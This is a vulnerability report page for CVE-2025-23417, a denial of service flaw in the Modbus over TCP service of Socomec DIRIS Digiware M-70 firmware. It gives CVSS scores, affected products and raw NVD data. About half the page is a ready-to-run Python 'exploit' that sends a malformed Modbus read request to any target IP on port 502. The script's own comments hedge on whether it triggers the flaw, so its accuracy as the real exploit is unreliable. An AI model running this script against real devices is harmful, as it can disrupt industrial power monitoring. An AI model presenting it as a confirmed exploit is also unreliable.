Security Vulnerability Report
中文
CVE-2025-23417 CVSS 8.6 HIGH

CVE-2025-23417

Published: 2025-12-01 16:15:52
Last Modified: 2025-12-05 20:49:08
Source: [email protected]

Description

A denial of service vulnerability exists in the Modbus RTU over TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted network packet can lead to denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:socomec:diris_m-70_firmware:1.6.9:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:socomec:diris_m-70:-:*:*:*:*:*:*:* - NOT VULNERABLE
Socomec DIRIS Digiware M-70 1.6.9及更早版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2025-23417 PoC - Socomec DIRIS Digiware M-70 Modbus RTU DoS Note: This PoC is for educational and authorized testing purposes only. """ import socket import struct import sys def create_malformed_modbus_packet(): """Create a malformed Modbus RTU packet to trigger DoS condition""" # Modbus TCP header (MBAP) transaction_id = struct.pack('>H', 0x0001) protocol_id = struct.pack('>H', 0x0000) length = struct.pack('>H', 0x0009) # Length of remaining bytes unit_id = struct.pack('B', 0xFF) # Unit identifier # Modbus PDU with malformed data function_code = struct.pack('B', 0x03) # Read Holding Registers starting_address = struct.pack('>H', 0x0000) # Malformed: invalid quantity that may cause buffer overflow quantity = struct.pack('>H', 0xFFFF) # Invalid quantity value packet = transaction_id + protocol_id + length + unit_id + \ function_code + starting_address + quantity return packet def exploit(target_ip, target_port=502): """Send malformed packet to trigger CVE-2025-23417""" print(f"[*] Target: {target_ip}:{target_port}") print(f"[*] Crafting malformed Modbus RTU packet...") packet = create_malformed_modbus_packet() try: print(f"[*] Sending malicious packet ({len(packet)} bytes)...") sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_ip, target_port)) sock.send(packet) print(f"[+] Packet sent successfully") print(f"[*] Target may be experiencing DoS condition") sock.close() except socket.timeout: print(f"[-] Connection timeout - target may already be affected") except socket.error as e: print(f"[-] Socket error: {e}") except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 502 exploit(target, port)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-23417", "sourceIdentifier": "[email protected]", "published": "2025-12-01T16:15:52.207", "lastModified": "2025-12-05T20:49:08.017", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial of service vulnerability exists in the Modbus RTU over TCP functionality of Socomec DIRIS Digiware M-70 1.6.9. A specially crafted network packet can lead to denial of service. An attacker can send an unauthenticated packet to trigger this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:socomec:diris_m-70_firmware:1.6.9:*:*:*:*:*:*:*", "matchCriteriaId": "C07608BE-E7E3-44F5-AE9A-4AE36679F58A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:socomec:diris_m-70:-:*:*:*:*:*:*:*", "matchCriteriaId": "153A9D26-2C76-4B6B-AFD8-22DEB2081F34"}]}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2139", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.socomec.fr/sites/default/files/2025-04/CVE-2025-23417---Diris-Digiware-Webview-_VULNERABILITIES_2025-04-11-17-16-19_English_0.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2139", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.